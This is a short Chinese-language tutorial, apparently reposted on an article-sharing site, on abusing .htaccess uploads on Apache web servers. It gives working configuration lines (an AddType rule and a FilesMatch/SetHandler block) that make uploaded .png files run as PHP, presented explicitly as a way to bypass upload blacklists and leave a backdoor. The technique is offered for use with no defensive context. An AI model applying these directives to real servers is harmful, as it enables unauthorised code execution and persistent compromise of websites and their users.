.htaccess文件上傳利用


一般.htaccess可以用來留后門和針對黑名單繞過

創建一個txt寫入

AddType  application/x-httpd-php    .png

打開另存為

保存類型為所有文件

上傳.htaccess 必須是網站根路徑 

讓png解析為php 

2.留后門 可以在.htaccess 加入php解析規則

類似於把文件名包含1的解析成php

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

123456.png  就會以php執行


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM